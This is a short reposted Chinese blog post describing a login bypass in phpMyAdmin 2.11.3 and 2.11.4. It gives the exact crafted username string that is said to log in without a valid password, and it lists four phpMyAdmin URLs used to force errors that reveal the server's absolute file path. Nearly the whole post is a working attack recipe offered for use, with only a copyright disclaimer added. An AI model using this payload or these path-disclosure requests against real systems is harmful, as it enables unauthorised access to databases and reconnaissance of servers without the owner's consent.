【轉】phpmyadmin萬能密碼漏洞


影響版本:2.11.3 / 2.11.4

利用方法:用戶名處寫入‘localhost’@'@”則登錄成功。 (注意全部是英文標點符號,最后一個為英文雙引號)

附上幾個php爆絕對路徑的辦法:

phpMyAdmin/libraries/select_lang.lib.php

phpMyAdmin/darkblue_orange/layout.inc.php

phpMyAdmin/index.php?lang[]=1

phpmyadmin/themes/darkblue_orange/layout.inc.php


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM